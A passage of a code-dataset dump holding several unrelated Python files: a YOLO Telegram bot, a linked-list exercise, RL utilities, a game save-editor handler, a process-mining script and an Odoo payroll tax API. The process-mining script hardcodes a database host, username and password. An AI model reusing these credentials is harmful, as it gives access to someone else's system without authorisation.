list(MODEL_YOLO(img).pred[0].numpy())\n objs = []\n if len(result) == 0:\n update.message.reply_text('На фото не обнаруженно дорожных знаков или мусора')\n else:\n for obj in result:\n x_up, y_up, x_low, y_low = obj[:4]\n variance = round(obj[4] + 0, 2)\n id_ = int(obj[5])\n objs.append(LIST_OBJ[id_])\n text = f'{LIST_OBJ[id_]} - {variance}'\n text_size, _ = cv2.getTextSize(text, FONT, FONT_SCALE, THICKNESS)\n text_w, text_h = text_size\n img_response = cv2.rectangle(img, (int(x_up), int(y_up - text_h)), (int(x_low), int(y_up)), (0, 0, 255), -1)\n img_response = cv2.rectangle(img_response, (int(x_up), int(y_up)),\n (int(x_low), int(y_low)), (0, 0, 255), 2)\n img_response = cv2.putText(img_response, text, (int(x_up), int(y_up - (img.shape[0] // 100))),\n FONT, FONT_SCALE, (255, 0, 0), THICKNESS)\n\n pil_image = Image.fromarray(img_response)\n bio = BytesIO()\n pil_image.save(bio, 'JPEG')\n bio.seek(0)\n\n context.bot.send_photo(update.message.chat.id, bio)\n # context.bot.send_video(chat_id=update.message.chat_id, video=open('/home/artemii_vibs/PycharmProjects/tg_bot_skpdi/file_16.mp4_new.mp4', 'rb'), supports_streaming=True)\n context.bot.send_message(update.message.chat.id, f\"\"\"\n На фото обнаруженны:\n Дорожные знаки - {objs.count(LIST_OBJ[0])}\n Мусор - {objs.count(LIST_OBJ[1])}\n \"\"\")\n time_answer = ((datetime.now() - start_time).microseconds) / 1000000\n logging.info(f\"\"\"\n \nCompleted send photo with detect: \nДоро��ные знаки - {objs.count(LIST_OBJ[0])} \nМусор - {objs.count(LIST_OBJ[1])}\nSend answer to {update.message.from_user.id}\n {update.message.from_user.first_name}\n {update.message.from_user.last_name}\n {update.message.from_user.username}\nTime answer seconds - {time_answer}\n\n\"\"\")\n\n\ndef handle_video(update, context):\n start_time = datetime.now()\n file = context.bot.get_file(update.message.video).download()\n cap = cv2.VideoCapture(file)\n count_frames_video = round(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n size = (width, height)\n fps_video = round(cap.get(cv2.CAP_PROP_FPS))\n name_video = f'{file}_new.mp4'\n out = cv2.VideoWriter(name_video, 
cv2.VideoWriter_fourcc(*'DIVX'), fps_video, size, 0)\n for _ in tqdm(range(count_frames_video), desc=''):\n success, img = cap.read()\n img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n result = list(MODEL_YOLO(img).pred[0].numpy())\n for obj in result:\n x_up, y_up, x_low, y_low = obj[:4]\n variance = round(obj[4] + 0, 2)\n id_ = int(obj[5])\n text = f'{LIST_OBJ[id_]} - {variance}'\n text_size, _ = cv2.getTextSize(text, FONT, FONT_SCALE, THICKNESS)\n text_w, text_h = text_size\n img = cv2.rectangle(img, (int(x_up), int(y_up - text_h)), (int(x_low), int(y_up)), (0, 0, 255), -1)\n img = cv2.rectangle(img, (int(x_up), int(y_up)),\n (int(x_low), int(y_low)), (0, 0, 255), 2)\n img = cv2.putText(img, text, (int(x_up), int(y_up - (img.shape[0] // 100))),\n FONT, FONT_SCALE, (255, 0, 0), THICKNESS)\n\n out.write(img)\n out.release()\n context.bot.send_video(chat_id=update.message.chat_id, video=open(name_video, 'rb'), supports_streaming=True)\n\n\n\nupdater = Updater(TOKEN, use_context=True)\ndp = updater.dispatcher\n\ndp.add_handler(CommandHandler('start', start))\ndp.add_handler(MessageHandler(Filters.text, handle_message))\ndp.add_handler(MessageHandler(Filters.photo, handle_photo))\ndp.add_handler(MessageHandler(Filters.video, handle_video))\n\nupdater.start_polling()\nupdater.idle()\n","repo_name":"Leotiv-Vibs/tg_bot","sub_path":"tg_bot.py","file_name":"tg_bot.py","file_ext":"py","file_size_in_byte":5550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"4290871639","text":"'''\r\nAdam Roy\r\nFINAL PROGRAM Part 4\r\nCSCI 161\r\n'''\r\n#ver 1.8\r\nclass Node:\r\n def __init__(self,data):\r\n self.data = data\r\n self.point = None\r\ndef is_palindrome(head):\r\n s = head\r\n stack = []\r\n ispalin = True\r\n while s != None:\r\n stack.append(s.data)\r\n s = s.point\r\n while head != None:\r\n i = stack.pop()\r\n if head.data == i:\r\n ispalin = True\r\n else:\r\n ispalin = False\r\n break\r\n head = head.point\r\n return ispalin\r\nList1 = [1,2,2,1]\r\nList2 = [1,2,3,4,5]\r\na = Node(1)\r\nb = Node(2)\r\nc = Node(2)\r\nd = Node(1)\r\na.point = b\r\nb.point = c\r\nc.point = d\r\nd.point = None\r\nresult = is_palindrome(a)\r\nprint(List1)\r\nNL1 = List1[::-1]\r\nprint(NL1)\r\nprint('Is palindrome: ', result)\r\n\r\na = Node(1)\r\nb = Node(2)\r\nc = Node(3)\r\nd = Node(4)\r\ne = Node(5)\r\na.point = b\r\nb.point = c\r\nc.point = d\r\nd.point = e\r\ne.point = None\r\nresult = is_palindrome(a)\r\nprint()\r\nprint(List2)\r\nNL2 = List2[::-1]\r\nprint(NL2)\r\nprint('Is palindrome: ', result)","repo_name":"adamr814/College_Course_Code","sub_path":"CSCI 161/Final Exam/Part4.py","file_name":"Part4.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"25300097130","text":"import torch.optim as optim\nimport torch\nimport torch.nn as nn\nfrom torch.optim import Adam\nfrom tqdm import tqdm\nimport torch.nn.functional as F\nimport numpy as np\nimport random \nimport gym\nfrom torch.distributions.categorical import Categorical\nfrom torch.distributions.normal import Normal\nfrom torch.distributions.multivariate_normal import MultivariateNormal\nfrom torch.distributions.kl import kl_divergence\nimport multiprocessing as mp\nfrom functools import partial\nfrom IPython.display import clear_output\nfrom datetime import datetime\nimport matplotlib.pyplot as plt\nfrom matplotlib import colors\nfrom collections import deque\nimport copy\nimport math\nimport gym\nfrom gym import spaces, logger\nfrom gym.utils import seeding\nimport numpy as np\nfrom gym.envs.classic_control.cartpole import CartPoleEnv\n\nclass nCartPoleEnv(CartPoleEnv):\n def __init__(self):\n super(nCartPoleEnv,self).__init__()\n self.gravity = 9.8\n self.length = random.random() *2 # actually half the pole's length\n self.masspole = random.random()\n self.masscart = random.random()*5\n self.total_mass = (self.masspole + self.masscart)\n self.polemass_length = (self.masspole * self.length)\n self.tau = 0.02 # seconds between state updates\n self.kinematics_integrator = 'euler'\n def reset(self):\n obs = super().reset()\n self.length = random.random() *2\n self.masspole = random.random()\n self.masscart = random.random()*5\n self.total_mass = (self.masspole + self.masscart)\n self.polemass_length = (self.masspole * self.length)\n return obs\n \ndef conv(): return nn.Sequential(nn.Conv1d(2,2,kernel_size = 3, padding=1),nn.LeakyReLU(), nn.BatchNorm1d(2))\n\ndef information_radius(P,Q):\n mu = (P.loc+Q.loc)/2\n if type(P)==MultivariateNormal:\n C = (P.scale_tril+Q.scale_tril)/4\n M = MultivariateNormal(mu,C)\n else:\n std = ((P.variance+Q.variance)/4).sqrt()\n M = Normal(mu,std)\n return (kl_divergence(P,M)+kl_divergence(Q,M))/2\n\ndef j_divergence(P,Q):\n return (kl_divergence(P,Q)+kl_divergence(Q,P))/2\n\ndef ag_divergence(P,Q):\n mu = (P.loc+Q.loc)/2\n if type(P)==MultivariateNormal:\n C = (P.scale_tril+Q.scale_tril)/4\n M = MultivariateNormal(mu,C)\n else:\n std = ((P.variance+Q.variance)/4).sqrt()\n M = Normal(mu,std)\n return (kl_divergence(M,P)+kl_divergence(M,Q))/2\n\nclass SILogStd(nn.Module):\n def __init__(self,ni,nh):\n super(SILogStd,self).__init__()\n self.value = nn.Parameter(torch.ones(nh)*1e-3)\n def forward(self,x): return self.value\n \nclass SDLogStd(nn.Module):\n def __init__(self,ni,nh):\n super(SDLogStd,self).__init__()\n self.M = nn.Sequential(nn.Linear(ni,nh),\n nn.LeakyReLU(),\n nn.Linear(nh,nh))\n def forward(self,x):\n return self.M(x)\n \ndef reflect_major_diag(x):\n h,w = x.shape #assume square matrix\n y = x*torch.tensor(np.tri(h))\n return (y+y.T)/(torch.ones(h,w)+torch.eye(w))\n\nclass MixerMLP(nn.Module):\n def __init__(self,nh):\n super(MixerMLP,self).__init__()\n self.mlp = nn.ModuleList([nn.Linear(2,2),\n nn.Linear(nh,nh)])\n self.norm = nn.LayerNorm(nh)\n def forward(self,x):\n return self.norm(self.mlp[1](self.mlp[0](x.T).relu().T).relu())\n \nclass SICovarianceMatrix(nn.Module):\n def __init__(self,ni,nh):\n super(SICovarianceMatrix,self).__init__()\n self.value = nn.Parameter(torch.eye(nh))\n self.mask = torch.tensor(np.tri(nh),requires_grad=False)\n self.nh = nh\n def forward(self,x):\n L = self.value*self.mask\n L = torch.matmul(L,L.T)*self.mask+torch.eye(self.nh)\n return L.float()\n \nclass SDCovarianceMatrix(nn.Module):\n def 
__init__(self,ni,nh):\n super(SDCovarianceMatrix,self).__init__()\n self.L = nn.Sequential(nn.Linear(ni,nh),\n nn.ReLU())\n self.mask = torch.tensor(np.tri(nh),requires_grad=False)\n self.nh = nh\n init_weights(self)\n def forward(self,x):\n L = self.L(x).unsqueeze(-1)\n L = torch.matmul(L,L.T)\n L = L*self.mask+torch.eye(self.nh)\n return torch.matmul(L,L.T).float() \n \n \ndef set_seed(env=None,proc_num=1):\n random.seed(proc_num)\n torch.manual_seed(proc_num)\n np.random.seed(proc_num)\n if env is not None: env.seed(proc_num)\n\ndef init_weights(m):\n if isinstance(m, nn.Linear):\n nn.init.normal_(m.weight, mean=0., std=0.1)\n nn.init.constant_(m.bias, 0.1)\n\ndef batch_term(x,y,term=information_radius):\n score = 0\n for x_,y_ in zip(x,y):\n score += term(x_,y_).sum()\n return score/len(x)\n\ndef reshape(x):\n if len(x.shape)==1:\n x = x.unsqueeze(0) #singular batch \n return x\n \nclass Attention(nn.Module):\n def __init__(self,ni):\n super(Attention,self).__init__()\n self.key = nn.Linear(ni,ni)\n self.value = nn.Linear(ni,ni)\n self.query = nn.Linear(ni,ni)\n def forward(self,k,v,q,negate = False):\n [k,v,q] = [reshape(x) for x in [k,v,q]]\n mask = torch.bmm(self.query(q).unsqueeze(-1),self.key(k).unsqueeze(-1).transpose(1,-1)).softmax(1)\n if negate:\n mask = F.normalize(1-mask,1)\n return torch.bmm(mask, v.unsqueeze(-1)).squeeze()\n return torch.bmm(mask, v.unsqueeze(-1)).squeeze()\n \nclass LatentQuery(nn.Module):\n def __init__(self, nh):\n super(LatentQuery,self).__init__()\n self.query = nn.Parameter(torch.ones(nh).float())\n def forward(self,x):\n return self.query","repo_name":"domhuh/mixmaskac","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"13701083499","text":"\"\"\"Handler for editing the ototo cat cannon\"\"\"\nfrom typing import Any, Optional\n\nfrom ... import user_input_handler, game_data_getter, csv_handler, helper\n\n\ndef get_canon_types(is_jp: bool) -> Optional[list[str]]:\n \"\"\"Get the cannon types\"\"\"\n\n file_data = game_data_getter.get_file_latest(\n \"resLocal\", \"CastleRecipeDescriptions.csv\", is_jp\n )\n if file_data is None:\n helper.error_text(\"Could not find CastleRecipeDescriptions.csv\")\n return None\n data = csv_handler.parse_csv(\n file_data.decode(\"utf-8\"),\n delimeter=helper.get_text_splitter(is_jp),\n )\n types: list[str] = []\n for cannon in data:\n types.append(cannon[1])\n return types\n\n\ndef get_cannon_maxes(is_jp: bool) -> Optional[dict[int, dict[int, int]]]:\n \"\"\"Get the cannon maxes\"\"\"\n file_data = game_data_getter.get_file_latest(\n \"DataLocal\", \"CastleRecipeUnlock.csv\", is_jp\n )\n if file_data is None:\n helper.error_text(\"Could not find CastleRecipeUnlock.csv\")\n return None\n data = helper.parse_int_list_list(csv_handler.parse_csv(file_data.decode(\"utf-8\")))\n maxes: dict[int, dict[int, int]] = {}\n for cannon in data:\n cannon_id = cannon[0]\n part = cannon[1]\n max_val = cannon[-1]\n if cannon_id not in maxes:\n maxes[cannon_id] = {}\n if part not in maxes[cannon_id]:\n maxes[cannon_id][part] = max_val\n elif max_val > maxes[cannon_id][part]:\n maxes[cannon_id][part] = max_val\n return maxes\n\n\ndef get_part_id_from_str(part: str) -> int:\n \"\"\"Get the part id from the string\"\"\"\n if part == \"effect\":\n return 0\n if part == \"foundation\":\n return 1\n if part == \"style\":\n return 2\n return 0\n\n\ndef get_max(\n part: str, cannon_id: int, cannon_maxes: dict[int, dict[int, int]]\n) -> Optional[int]:\n \"\"\"Get the max value for the part\"\"\"\n part_id = get_part_id_from_str(part)\n if cannon_id not in cannon_maxes:\n return None\n if part_id not in cannon_maxes[cannon_id]:\n return None\n return cannon_maxes[cannon_id][part_id]\n\n\ndef edit_cat_cannon(save_stats: dict[str, Any]) -> dict[str, Any]:\n \"\"\"Handler for ototo cat cannon upgrades\"\"\"\n\n cannons: dict[int, dict[str, Any]] = save_stats[\"ototo_cannon\"]\n\n cannon_types = get_canon_types(helper.check_data_is_jp(save_stats))\n if cannon_types is None:\n return save_stats\n\n cannon_maxes = get_cannon_maxes(helper.check_data_is_jp(save_stats))\n if cannon_maxes is None:\n return save_stats\n\n extra_data: list[str] = []\n for i in range(len(cannon_types)):\n levels = cannons[i][\"levels\"]\n if i == 0:\n extra_data.append(f\"Level: &{levels['effect']+1}&\")\n continue\n string = \"\"\n for level_str, level in levels.items():\n part_id = get_part_id_from_str(level_str)\n if part_id == 0:\n level += 1\n string += f\"{level_str.title()}: &{level}&, \"\n string = string[:-2]\n string += f\" (Development: &{cannons[i]['unlock_flag']}&)\"\n extra_data.append(string)\n\n cannon_ids = user_input_handler.select_not_inc(cannon_types, extra_data=extra_data)\n if len(cannon_ids) > 1:\n individual = user_input_handler.ask_if_individual(\"Cat Cannons\")\n else:\n individual = True\n\n if individual:\n for cannon_id in cannon_ids:\n helper.colored_text(\n f\"Editing &{cannon_types[cannon_id]}&\", helper.WHITE, helper.GREEN\n )\n cannon = cannons[cannon_id]\n if cannon_id == 0:\n max = get_max(\"effect\", cannon_id, cannon_maxes)\n if max is None:\n continue\n level = user_input_handler.get_int(\n f\"Enter the level to upgrade the base to (Max &{max}&):\",\n )\n level -= 1\n level = 
helper.config_clamp(level, 0, max)\n cannon[\"levels\"][\"effect\"] = level\n continue\n develop_stage = (\n user_input_handler.colored_input(\n \"Do you want to set the stage of development (&1&) or the upgrade level? (&2&):\",\n )\n == \"1\"\n )\n if develop_stage:\n unlock_flag = user_input_handler.get_int(\n \"Enter the stage of development (1=effect, 2=foundation, 3=style):\",\n )\n unlock_flag = helper.config_clamp(unlock_flag, 0, 3)\n cannon[\"unlock_flag\"] = unlock_flag\n if unlock_flag != 3:\n for level_str in cannon[\"levels\"]:\n cannon[\"levels\"][level_str] = 0\n else:\n cannon[\"upgrade_flag\"] = 3\n for level_str in cannon[\"levels\"]:\n max = get_max(level_str, cannon_id, cannon_maxes)\n if max is None:\n continue\n part_id = get_part_id_from_str(level_str)\n level = user_input_handler.get_int(\n f\"Enter the level to upgrade &{level_str}& to (Max &{max}&):\"\n )\n if part_id == 0:\n level -= 1\n level = helper.config_clamp(level, 0, max)\n cannon[\"levels\"][level_str] = level\n else:\n develop_stage = (\n user_input_handler.colored_input(\n \"Do you want to set the stage of development (&1&) or the upgrade level? (&2&):\",\n )\n == \"1\"\n )\n if develop_stage:\n unlock_value = user_input_handler.get_int(\n \"Enter the stage of development (1=effect, 2=foundation, 3=style):\",\n )\n unlock_value = helper.config_clamp(unlock_value, 0, 3)\n for cannon_id in cannon_ids:\n cannons[cannon_id][\"unlock_flag\"] = unlock_value\n if unlock_value != 3:\n for level_str in cannons[cannon_id][\"levels\"]:\n cannons[cannon_id][\"levels\"][level_str] = 0\n else:\n max_max = 0\n for cannon_id in cannon_ids:\n for part_id in cannon_maxes[cannon_id]:\n if cannon_maxes[cannon_id][part_id] > max_max:\n max_max = cannon_maxes[cannon_id][part_id]\n\n level = user_input_handler.get_int(\n f\"Enter the level to upgrade everything to (Max &{max_max}&):\",\n )\n for cannon_id in cannon_ids:\n cannon = cannons[cannon_id]\n cannon[\"upgrade_flag\"] = 3\n for level_str in cannon[\"levels\"]:\n max = get_max(level_str, cannon_id, cannon_maxes)\n if max is None:\n continue\n part_id = get_part_id_from_str(level_str)\n level_ = level\n if part_id == 0:\n level_ -= 1\n if cannon_id == 0:\n part_id = 0\n level_ = helper.config_clamp(\n level_, 0, cannon_maxes[cannon_id][part_id]\n )\n cannon[\"levels\"][level_str] = level_\n\n return save_stats\n","repo_name":"fieryhenry/BCSFE-Python","sub_path":"src/BCSFE_Python/edits/gamototo/ototo_cat_cannon.py","file_name":"ototo_cat_cannon.py","file_ext":"py","file_size_in_byte":7377,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"61"}
+{"seq_id":"13975471636","text":"#Обработка данных и подключение к БД\nfrom sberpm import DataHolder\nfrom sberpm.metrics import ActivityMetric, TransitionMetric, IdMetric, TraceMetric, UserMetric\n\nimport pandas as pd\nimport clickhouse_connect\n\n#Graphviz\nfrom sberpm.visual import GraphvizPainter,ChartPainter\nimport graphviz as gz\nimport custom_painter as c_p\n\n#Различные варинаты майнеров\nfrom sberpm.miners import HeuMiner, SimpleMiner,CausalMiner,AlphaMiner,AlphaPlusMiner, InductiveMiner, CorrelationMiner\n\ndef initializating_pm():\n\n#Получение и обработка БД\n #Обработка из локального файла, лучше использовать если сидишь в отладчике, иначе будет собирать DataHolder от 10с до 40с, локально в разы быстрее\n #data_holder = DataHolder(data='test2.csv', id_column='case_id',\n # activity_column='activity',\n # start_timestamp_column='start time',\n # end_timestamp_column='end time',\n # time_format='%m/%d/%Y %I:%M:%S %p')\n\n client = clickhouse_connect.get_client(host='pheerses.space', port=8123, username='practice', password='secretKey_lhv323as5vc_d23k32mk')\n\n # Получение данных и преобразование в DataFrame\n #Соединение часто недостаточно быстрое чтобы заниматсья дебагом\n lst_data = []\n list_id = client.query('SELECT case_id, activity, start_time, end_time FROM main_table')\n for i in list_id.result_rows:\n lst_data.append(i)\n lst_name = list_id.column_names\n df = pd.DataFrame(lst_data, columns=lst_name)\n\n data_holder = DataHolder(data=df,\n id_column='case_id',\n activity_column='activity',\n start_timestamp_column='start_time',\n end_timestamp_column='end_time',\n time_format='%Y-%m-%d %I:%M:%S')\n\n data_holder.check_or_calc_duration()\n data_holder.data.head()\n data_holder.get_grouped_data(data_holder.activity_column, data_holder.start_timestamp_column).head()\n\n activity_metric = ActivityMetric(data_holder,time_unit='d')\n activity_metric.calculate_time_metrics()\n activity_metric.apply().head()\n count_metric = activity_metric.count().to_dict()\n time_metric = activity_metric.mean_duration().to_dict()\n #transition_metric = TransitionMetric(data_holder,time_unit='d')\n #transition_metric.apply().head()\n #edges_count_metric = activity_metric.count().to_dict()\n\n #trace_metric = TraceMetric(data_holder,time_unit='d')\n #trace_metric.apply().head()\n #edges_count_metric = trace_metric.mean_duration().to_dict()\n\n transition_metric = TransitionMetric(data_holder,time_unit='d')\n transition_metric.apply().head()\n edges_count_metric = transition_metric.mean_duration().to_dict()\n\n#Область объявления майнеров\n\n #Обявление списка на отрисовку\n miner_graphs = []\n\n #Hei miner\n heu_miner = HeuMiner(data_holder, threshold=0.8)\n heu_miner.apply()\n miner_graphs.append(heu_miner.graph)\n\n #Simple Miner\n #simple_miner = SimpleMiner(data_holder)\n #simple_miner.apply()\n #miner_graphs.append(simple_miner.graph)\n\n #Casual Miner\n #casual_miner = CausalMiner(data_holder)\n #casual_miner.apply()\n #miner_graphs.append(casual_miner.graph)\n\n #Alpha Miner\n #alpha_miner = AlphaMiner(data_holder)\n #alpha_miner.apply()\n #miner_graphs.append(alpha_miner.graph)\n\n #AlphaPlus Miner\n #alphaplus_miner = AlphaPlusMiner(data_holder)\n #alphaplus_miner.apply()\n #miner_graphs.append(alphaplus_miner.graph)\n\n #InductiveMiner Miner\n #inductive_miner = InductiveMiner(data_holder)\n #inductive_miner.apply()\n #miner_graphs.append(inductive_miner.graph)\n\n #CorrelationMiner Miner\n #correlation_miner = CorrelationMiner(data_holder)\n #correlation_miner.apply()\n 
#correlation_miner.append(correlation_miner.graph)\n\n#Графики\n #painter = ChartPainter(data_holder)\n #painter.hist_activity_of_dur(top= False, use_median=False)\n#Модуль отисовки\n for (index,elem) in enumerate(miner_graphs):\n try:\n elem.add_node_metric('count',count_metric)\n elem.add_edge_metric('count', edges_count_metric)\n except:\n print('ошибочка')\n painter = GraphvizPainter()\n #painter.apply(elem,node_style_metric='count', edge_style_metric='count')\n custom_graph(elem.nodes,elem.edges,'graph' + str(index),format='svg')\n #painter.write_graph('graph'+str(index)+'.svg',format='svg')\n\n\n#Кастомная функция для отрисовки готовых графов, создана по причине отсутствия стилизации средств встроенных в библиотеку sberPm\ndef custom_graph(nodes,edges,file,format='svg'):\n img = c_p.CustomPainter()\n img.create(nodes,edges,file)\n #ps = gz.Digraph(file, node_attr={'shape': 'plaintext', 'color': '#2d137d', 'fontcolor': '#2d137d',\n # 'fontsize': '12.0', 'size': '2', 'image': '1.png'},\n # edge_attr={'color': '#2d137d', 'fontcolor': '#2d137d'})\n\n #Перенос вершин графов и их весов из майнера в Digraph\n #Перенос вершин графов\n #for g_node in nodes:\n # metric = nodes.get(g_node).metrics.get('count')\n # if g_node == 'startevent':\n # ps.node(g_node, image='', label='')\n # elif g_node == 'endevent':\n # ps.node(g_node, image='', label='')\n # else:\n # ps.node(g_node,label=r'' + g_node + '\\n'+' ' + str(metric) + '\\l')\n\n #Перенос весов графов\n # for g_edge in edges:\n # metric = edges.get(g_edge).metrics.get('count')\n # if metric == None:\n # ps.edge(g_edge[0],g_edge[1])\n # else:\n # ps.edge(g_edge[0],g_edge[1],label=str(metric))\n\n\n #Вывод svg файла\n # ps.format = format\n # ps.render()\n\nif __name__ == '__main__':\n initializating_pm()\n\n","repo_name":"CoulMacGrath/Coul","sub_path":"main_old.py","file_name":"main_old.py","file_ext":"py","file_size_in_byte":6402,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"70912637953","text":"# -*- coding: utf-8 -*-\nimport logging\ntry:\n import simplejson as json\nexcept ImportError:\n import json\n\nimport werkzeug.wrappers\n\nfrom odoo import http\nfrom odoo.http import request\n\n_logger = logging.getLogger(__name__)\nOUT__auth_gettokens__SUCCESS_CODE = 200\nOUT__auth_gettokens__ERROR_CODE = 400\n\n\ndef get_nassit(basic_pay, employee_type, age, nassit_contribution=True):\n nassit = 0.0\n nassittee = 0.0\n if employee_type == 'local':\n if age >= 60:\n return {'Nassit': nassit, 'Nassittee': nassittee}\n if not nassit_contribution:\n return {'Nassit': nassit, 'Nassittee': nassittee}\n else:\n nassit += basic_pay * 0.05\n nassittee += basic_pay * 0.10\n return {'Nassit': nassit, 'Nassittee': nassittee}\n\n\ndef calculate_sl_tax(basic_pay, gross, age, employee_type, non_tax_earning, nassit_contribution=True):\n nassits = get_nassit(basic_pay, employee_type, age, nassit_contribution)\n total_paye = 0.0\n if employee_type == 'foreign':\n total_paye += basic_pay * 0.05\n else:\n tax_income = gross - nassits['Nassit'] - non_tax_earning\n if tax_income <= 500000:\n return {'Paye': total_paye, 'Nassit': nassits['Nassit'], 'Nassittee': nassits['Nassittee']}\n if 500000 < tax_income <= 1000000:\n total_paye += (tax_income - 500000) * 0.15\n return {'Paye': total_paye, 'Nassit': nassits['Nassit'], 'Nassittee': nassits['Nassittee']}\n if 1000000 < tax_income <= 1500000:\n total_paye += (tax_income - 1000000) * 0.20 + 75000\n return {'Paye': total_paye, 'Nassit': nassits['Nassit'], 'Nassittee': nassits['Nassittee']}\n if 1500000 < tax_income <= 2000000:\n total_paye += (tax_income - 1500000) * 0.25 + 75000 + 100000\n return {'Paye': total_paye, 'Nassit': nassits['Nassit'], 'Nassittee': nassits['Nassittee']}\n if 2000000 < tax_income <= 2000000000:\n total_paye += (tax_income - 2000000) * 0.30 + 75000 + 100000 + 125000\n return {'Paye': total_paye, 'Nassit': nassits['Nassit'], 'Nassittee': nassits['Nassittee']}\n\n\ndef calculate_gmb_tax(gross, non_tax_earning):\n total_paye = 0.0\n tax_income = gross - non_tax_earning\n if tax_income <= 2000:\n return {'Monthly Income Tax': total_paye, 'Yearly Income Tax': total_paye*12}\n if 2000 < tax_income <= 2833.3:\n total_paye += (tax_income - 833.3) * 0.05\n return {'Monthly Income Tax': total_paye, 'Yearly Income Tax': total_paye*12}\n if 2833.3 < tax_income <= 3666.6:\n total_paye += (tax_income - 2833.3) * 0.10 + 41.67\n return {'Monthly Income Tax': total_paye, 'Yearly Income Tax': total_paye*12}\n if 3666.6 < tax_income <= 4499.9:\n total_paye += (tax_income - 3666.6) * 0.15 + 41.67 + 83.33\n return {'Monthly Income Tax': total_paye, 'Yearly Income Tax': total_paye*12}\n if 4499.9 < tax_income <= 5333.2:\n total_paye += (tax_income - 4499.9) * 0.20 + 41.67 + 83.33 + 124.99\n return {'Monthly Income Tax': total_paye, 'Yearly Income Tax': total_paye*12}\n if 5333.2 < tax_income <= 2000000000:\n total_paye += (tax_income - 5333.2) * 0.25 + 41.67 + 83.33 + 124.99 + 166.67\n return {'Monthly Income Tax': total_paye, 'Yearly Income Tax': total_paye*12}\n\n\ndef check_values(value):\n return float(value) > 0.0 and type(value) == float\n\n\nclass ControllerREST(http.Controller):\n \n @http.route('/api/tax', methods=['POST'], type='http', auth='none', csrf=False)\n def api_tax_calculation(self):\n # Convert http data into json:\n _logger.info(\"API Was reached successfully\")\n try:\n jdata = json.loads(request.httprequest.stream.read())\n except:\n jdata = {}\n if 'country' in jdata:\n country = 
jdata.get('country')\n if country == 'sl':\n \"\"\"\n fields required for sl\n basic_pay, gross, age, employee_type, non_tax_earning, nassit_contribution=True\n \"\"\"\n try:\n basic_pay = jdata.get('basic_pay')\n assert float(basic_pay)\n except :\n return werkzeug.wrappers.Response(\n status=OUT__auth_gettokens__ERROR_CODE,\n content_type='application/json; charset=utf-8',\n headers=[('Cache-Control', 'no-store'),\n ('Pragma', 'no-cache')],\n response=json.dumps({'error': 'Required Parameter basic_pay not found or not in the required type'}),)\n\n try:\n gross = jdata.get('gross')\n assert float(gross)\n except:\n return werkzeug.wrappers.Response(\n status=OUT__auth_gettokens__ERROR_CODE,\n content_type='application/json; charset=utf-8',\n headers=[('Cache-Control', 'no-store'),\n ('Pragma', 'no-cache')],\n response=json.dumps({'error': 'Required Parameter gross not found or not in the required type'}),)\n\n try:\n age = jdata.get('age')\n assert int(age)\n except :\n return werkzeug.wrappers.Response(\n status=OUT__auth_gettokens__ERROR_CODE,\n content_type='application/json; charset=utf-8',\n headers=[('Cache-Control', 'no-store'),\n ('Pragma', 'no-cache')],\n response=json.dumps({'error': 'Required Parameter age not found or not in the required type'}),)\n\n try:\n employee_type = jdata.get('employee_type')\n assert len(str(employee_type)) > 0\n except :\n return werkzeug.wrappers.Response(\n status=OUT__auth_gettokens__ERROR_CODE,\n content_type='application/json; charset=utf-8',\n headers=[('Cache-Control', 'no-store'),\n ('Pragma', 'no-cache')],\n response=json.dumps({'error': 'Required Parameter employee_type not found or not in the required type'}),)\n\n try:\n non_tax_earning = jdata.get('non_tax_earning')\n assert float(non_tax_earning)\n except :\n return werkzeug.wrappers.Response(\n status=OUT__auth_gettokens__ERROR_CODE,\n content_type='application/json; charset=utf-8',\n headers=[('Cache-Control', 'no-store'),\n ('Pragma', 'no-cache')],\n response=json.dumps({'error': 'Required Parameter non_tax_earning not found or not in the required type'}),)\n\n try:\n nassit_contribution = jdata.get('nassit_contribution')\n assert bool(nassit_contribution)\n except :\n return werkzeug.wrappers.Response(\n status=OUT__auth_gettokens__ERROR_CODE,\n content_type='application/json; charset=utf-8',\n headers=[('Cache-Control', 'no-store'),\n ('Pragma', 'no-cache')],\n response=json.dumps({'error': 'Required Parameter nassit_contribution not found or not in the required type'}),)\n\n return werkzeug.wrappers.Response(\n status=OUT__auth_gettokens__SUCCESS_CODE,\n content_type='application/json; charset=utf-8',\n headers=[('Cache-Control', 'no-store'),\n ('Pragma', 'no-cache')],\n response=json.dumps(calculate_sl_tax(float(basic_pay),\n float(gross),\n int(age),\n str(employee_type),\n float(non_tax_earning),\n bool(nassit_contribution))),)\n if country == 'gmb':\n \"\"\"\n calculate_gmb_tax(gross, non_tax_earning)\n fields required for sl\n gross, non_tax_earning\n \"\"\"\n try:\n gross = jdata.get('gross')\n assert float(gross)\n assert float(gross) > 0.0\n except :\n return werkzeug.wrappers.Response(\n status=OUT__auth_gettokens__ERROR_CODE,\n content_type='application/json; charset=utf-8',\n headers=[('Cache-Control', 'no-store'),\n ('Pragma', 'no-cache')],\n response=json.dumps({'error': 'Required Parameter gross not found or not in the required type.'\n ' Gross must be a float greater than 0.0'}),)\n\n try:\n non_tax_earning = float(jdata.get('non_tax_earning'))\n assert 
